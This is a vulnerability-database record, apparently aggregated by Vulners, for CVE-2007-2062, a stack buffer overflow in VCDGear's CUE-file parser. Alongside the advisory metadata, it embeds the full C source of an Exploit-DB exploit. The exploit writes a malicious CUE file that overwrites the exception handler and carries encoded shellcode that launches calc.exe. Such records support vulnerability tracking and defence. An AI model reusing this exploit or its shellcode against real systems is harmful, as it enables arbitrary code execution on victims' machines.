{"bulletinFamily": "software", "viewCount": 1, "reporter": "OSVDB", "references": [], "description": "# No description provided by the source\n\n## References:\n[Secunia Advisory ID:24884](https://secuniaresearch.flexerasoftware.com/advisories/24884/)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-04/0230.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-04/0216.html\nISS X-Force ID: 33642\nGeneric Exploit URL: http://milw0rm.com/exploits/3727\n[CVE-2007-2062](https://vulners.com/cve/CVE-2007-2062)\nBugtraq ID: 23475\n", "affectedSoftware": [], "hashmap": [{"key": "affectedSoftware", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "bulletinFamily", "hash": "f9fa10ba956cacf91d7878861139efb9"}, {"key": "cvelist", "hash": "e13d02800488c42d4d54af7fca41d73b"}, {"key": "cvss", "hash": "2076413bdcb42307d016f5286cbae795"}, {"key": "description", "hash": "c7139937fdf259b799ff40a7544a0ea1"}, {"key": "href", "hash": "dc2081584ac42691cbf8447cc30ba499"}, {"key": "modified", "hash": "49a1e03bb9e4a5e147b8fe4f2322434e"}, {"key": "objectVersion", "hash": "56765472680401499c79732468ba4340"}, {"key": "published", "hash": "49a1e03bb9e4a5e147b8fe4f2322434e"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "955b328dc7cd615c13af5464c9183464"}, {"key": "title", "hash": "fdbaf74fb987a29ca6c60e7d47f9e3fe"}, {"key": "type", "hash": "1327ac71f7914948578f08c54f772b10"}], "href": "https://vulners.com/osvdb/OSVDB:34968", "modified": "2007-04-13T09:04:21", "objectVersion": "1.2", "enchantments": {"score": {"value": 4.3, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2007-2062"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:7583"]}, {"type": "exploitdb", "idList": ["EDB-ID:3727"]}], "modified": "2017-04-28T13:20:31"}, "vulnersScore": 4.3}, "id": "OSVDB:34968", "title": "VCDGear Cue File FILE Argument Overflow", "hash": "a605bda086a3f7fbce9d036ae61bf03ce914ab57f4ecda1ca6083d85605788b5", "edition": 1, "published": "2007-04-13T09:04:21", "type": "osvdb", "history": [], "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "cvelist": ["CVE-2007-2062"], "lastseen": "2017-04-28T13:20:31"}

{"cve": [{"lastseen": "2018-10-18T15:06:09", "bulletinFamily": "NVD", "description": "Stack-based buffer overflow in VCDGear 3.55 and 3.56 BETA allows user-assisted remote attackers to execute arbitrary code via a long FILE argument in a CUE file.", "modified": "2018-10-16T12:41:49", "published": "2007-04-17T23:19:00", "id": "CVE-2007-2062", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-2062", "title": "CVE-2007-2062", "type": "cve", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-01-31T19:09:31", "bulletinFamily": "exploit", "description": "VCDGear <= 3.56 Build 050213 (FILE) Local Code Execution Exploit. CVE-2007-2062. Local exploit for windows platform", "modified": "2007-04-13T00:00:00", "published": "2007-04-13T00:00:00", "id": "EDB-ID:3727", "href": "https://www.exploit-db.com/exploits/3727/", "type": "exploitdb", "title": "VCDGear <= 3.56 Build 050213 FILE Local Code Execution Exploit", "sourceData": "/* ~~~~~~~~~~~~~~0day~~~~~~~~~~~~~~~~~~\nDiscovered by: InTeL\nAuther: InTeL\nAttack Vector: SEH overwrite\nType: Local\nTested on Win2k SP4 (English)\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\nSoftware: VCDGear v3.56 build 050213\nWebsite: www.vcdgear.com\nDescription:\n\n\"VCDGear is a program designed to allow a user to extract MPEG streams from CD images, convert VCD files to MPEG, \ncorrect MPEG errors, and more -- all in a single step. Initially developed back in late 1997, the program has \ngrown to do various extractions, conversions, and corrections on the fly. Cross-platform support will allow \ndifferent machines to process and generate output that is compatible between one another. \n\nTotal Buf Size: 2512 - [Junk - 324][SEH overwrite - 8][NOP Sled and Shellcode room for - 2180]\n\nGreetz: erazerz, m03, devcode, #pen15\n*/\n\n#include <stdlib.h>\n#include <stdio.h>\n\n// Exec Calc.exe Scode\nunsigned char scode[] =\n\"\\xeb\\x03\\x59\\xeb\\x05\\xe8\\xf8\\xff\\xff\\xff\\x49\\x49\\x49\\x49\\x49\\x49\"\n\"\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x37\\x49\\x49\\x49\\x49\\x51\\x5a\\x6a\\x42\"\n\"\\x58\\x50\\x30\\x41\\x31\\x42\\x41\\x6b\\x41\\x41\\x52\\x32\\x41\\x42\\x41\\x32\"\n\"\\x42\\x41\\x30\\x42\\x41\\x58\\x50\\x38\\x41\\x42\\x75\\x38\\x69\\x79\\x6c\\x4a\"\n\"\\x48\\x67\\x34\\x47\\x70\\x77\\x70\\x53\\x30\\x6e\\x6b\\x67\\x35\\x45\\x6c\\x4c\"\n\"\\x4b\\x73\\x4c\\x74\\x45\\x31\\x68\\x54\\x41\\x68\\x6f\\x6c\\x4b\\x70\\x4f\\x57\"\n\"\\x68\\x6e\\x6b\\x71\\x4f\\x45\\x70\\x65\\x51\\x5a\\x4b\\x67\\x39\\x4c\\x4b\\x50\"\n\"\\x34\\x4c\\x4b\\x77\\x71\\x68\\x6e\\x75\\x61\\x4b\\x70\\x4e\\x79\\x6e\\x4c\\x4d\"\n\"\\x54\\x4b\\x70\\x72\\x54\\x65\\x57\\x69\\x51\\x49\\x5a\\x46\\x6d\\x37\\x71\\x6f\"\n\"\\x32\\x4a\\x4b\\x58\\x74\\x77\\x4b\\x41\\x44\\x44\\x64\\x35\\x54\\x72\\x55\\x7a\"\n\"\\x45\\x6c\\x4b\\x53\\x6f\\x51\\x34\\x37\\x71\\x48\\x6b\\x51\\x76\\x4c\\x4b\\x76\"\n\"\\x6c\\x50\\x4b\\x6e\\x6b\\x71\\x4f\\x67\\x6c\\x37\\x71\\x68\\x6b\\x4c\\x4b\\x65\"\n\"\\x4c\\x4c\\x4b\\x64\\x41\\x58\\x6b\\x4b\\x39\\x53\\x6c\\x75\\x74\\x46\\x64\\x78\"\n\"\\x43\\x74\\x71\\x49\\x50\\x30\\x64\\x6e\\x6b\\x43\\x70\\x44\\x70\\x4c\\x45\\x4f\"\n\"\\x30\\x41\\x68\\x44\\x4c\\x4e\\x6b\\x63\\x70\\x44\\x4c\\x6e\\x6b\\x30\\x70\\x65\"\n\"\\x4c\\x4e\\x4d\\x6c\\x4b\\x30\\x68\\x75\\x58\\x7a\\x4b\\x35\\x59\\x4c\\x4b\\x4d\"\n\"\\x50\\x58\\x30\\x37\\x70\\x47\\x70\\x77\\x70\\x6c\\x4b\\x65\\x38\\x57\\x4c\\x31\"\n\"\\x4f\\x66\\x51\\x48\\x76\\x65\\x30\\x70\\x56\\x4d\\x59\\x4a\\x58\\x6e\\x63\\x69\"\n\"\\x50\\x31\\x6b\\x76\\x30\\x55\\x38\\x5a\\x50\\x4e\\x6a\\x36\\x64\\x63\\x6f\\x61\"\n\"\\x78\\x6a\\x38\\x4b\\x4e\\x6c\\x4a\\x54\\x4e\\x76\\x37\\x6b\\x4f\\x4b\\x57\\x70\"\n\"\\x63\\x51\\x71\\x32\\x4c\\x52\\x43\\x37\\x70\\x42\";\n\n\nint main(int argc, char *argv[])\n{\n\tFILE *handle;\n\n\tif(argc < 2) {\n\t\tprintf(\"0day VCDGear exploit\\n\");\n\t\tprintf(\"Usage: %s <output CUE file>\", argv[0]);\n\t\treturn 0;\n\t}\n\n\tif(!(handle = fopen(argv[1], \"w\"))) {\n\t\tprintf(\"[+] Error\");\n\t\treturn 0;\n\t}\n\n\tfputs(\"FILE \\\"\", handle);\n\tfor (int i=0;i<324;i++) \\\n\t\tfputs(\"A\", handle);\n\t\n\tfputs(\"\\xeb\\x32\\x90\\x90\", handle);\n\tfputs(\"\\x3a\\x1f\\x03\\x75\", handle); //pop edi, pop esi, retn in ws2_32.dll (English / \t5.0.2195.6601)\n\tfor (i=0;i<200;i++) \n\t\tfputs(\"\\x90\", handle);\n\n\tfputs((char *)scode, handle);\n\tfputs(\"\\\" BINARY\\n\", handle);\n\tfputs(\" TRACK 01 MODE2/2352\\n\", handle);\n\tfputs(\" INDEX 01 00:00:00\\n\", handle);\n\t\n\tfclose(handle);\n\t\n\tprintf(\"[+] File successfully created\");\n\n\treturn 0;\n}\n\n// milw0rm.com [2007-04-13]\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/3727/"}], "securityvulns": [{"lastseen": "2018-08-31T11:09:25", "bulletinFamily": "software", "description": "Buffer overflow on parsing .cue files.", "modified": "2007-04-16T00:00:00", "published": "2007-04-16T00:00:00", "id": "SECURITYVULNS:VULN:7583", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:7583", "title": "VCDGear buffer overflow", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}